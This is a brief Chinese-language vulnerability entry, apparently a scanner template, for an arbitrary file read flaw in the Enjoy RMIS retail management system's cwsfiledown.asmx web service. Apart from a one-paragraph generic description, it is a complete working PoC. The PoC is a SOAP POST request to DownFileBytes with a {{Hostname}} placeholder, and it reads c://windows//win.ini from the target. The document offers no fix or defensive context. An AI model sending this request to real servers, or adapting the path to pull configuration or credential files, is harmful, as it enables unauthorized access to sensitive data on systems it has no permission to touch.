漏洞描述
文件读取漏洞是指攻击者通过某种方式获取对系统文件的读取权限,从而访问敏感信息,如配置文件、源代码、用户数据等。这种漏洞通常是由于应用程序未正确实施权限控制或者未对用户输入进行充分过滤和验证导致的。
昂捷商业连锁管理信息系统 cwsfiledown.asmx 任意文件读取漏洞
PoC代码
POST /EnjoyRMIS_WS/WS/FileDown/cwsfiledown.asmx HTTP/1.1
Host: {{Hostname}}
Accept-Encoding: gzip
Connection: keep-alive
Content-Length: 623
Content-Type: text/xml; charset=utf-8
Soapaction: "http://tempuri.org/DownFileBytes"
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<DownFileBytes xmlns="http://tempuri.org/">
<sFileName>c://windows//win.ini</sFileName>
<iPosition>1</iPosition>
<iReadBytesLen>100</iReadBytesLen>
<bReadBytes>ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg</bReadBytes>
</DownFileBytes>
</soap:Body>
</soap:Envelope>